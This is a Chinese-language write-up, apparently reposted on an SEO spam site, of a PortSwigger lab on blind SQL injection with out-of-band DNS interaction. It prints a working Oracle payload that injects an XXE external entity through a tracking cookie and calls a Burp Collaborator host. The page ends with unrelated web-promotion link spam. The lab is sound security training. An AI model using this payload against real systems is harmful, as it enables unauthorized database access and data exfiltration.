当前位置: 首页 > wzjs >正文

潍坊模板建站平台seo推广网址

潍坊模板建站平台,seo推广网址,秦皇岛网站建设服务,企业展厅设计公司100%正品保障文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 带外交互的 SQL 盲注 简介: 本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。 SQL查询是异步执…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

将 payload 粘贴在 cookie 后面,并进行 url 编码

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

返回商店页面,可以看到通关提示

http://www.dtcms.com/wzjs/263620.html

相关文章:

  • 微积木小程序代理加盟靠谱不肇庆网站快速排名优化
  • 做任务领佣金的网站南宁百度网站推广
  • 网站建设实训 课程标准南宁seo优化公司排名
  • 湖州建设局新网站静态网站模板
  • 博彩导航网站可以做吗西安seo托管
  • 哪些网站可以做问卷调查赚钱最新的全国疫情
  • 广西网站建设策划seo和sem的区别是什么?
  • 电脑系统点击seo软件
  • 万站群cms系统友情链接交换的作用在于
  • 织梦做网站主页容易吗网盟推广平台
  • 有口碑的南昌网站建设企业网站的功能
  • 企业网站的建设毕业论文灰色词优化培训
  • 最大的免费网站建设360广告推广平台
  • 娱乐平台网站建设百度问答平台
  • 如何建设一个商城网站代运营套餐价格表
  • 网站上面做测试题信息流优化师没经验可以做吗
  • 深圳设计周2021时间网站优化方案案例
  • 网站维护是谁做的百度主页面
  • 怎么在网站上做旅游推广郑州网络推广专业公司
  • 宁波建网站找哪家个人网站模板免费下载
  • 泰安人才市场廊坊seo推广
  • 百度网站关键词优化在哪里做宁波seo关键词
  • 南京做网站咨询南京乐识网站搜索关键词优化
  • 网站开发设计实训总结自动引流免费app
  • 做网站推广排名百度官方网址
  • 全球电子商务网站排名搜索引擎优化学习
  • 网站页面设计模板图片开发网站的流程
  • 做网站需要那些编程语言网络seo招聘
  • 武汉专业网站做网页百度导航下载安装手机导航
  • 视频网站后台设计不需要验证码的广告平台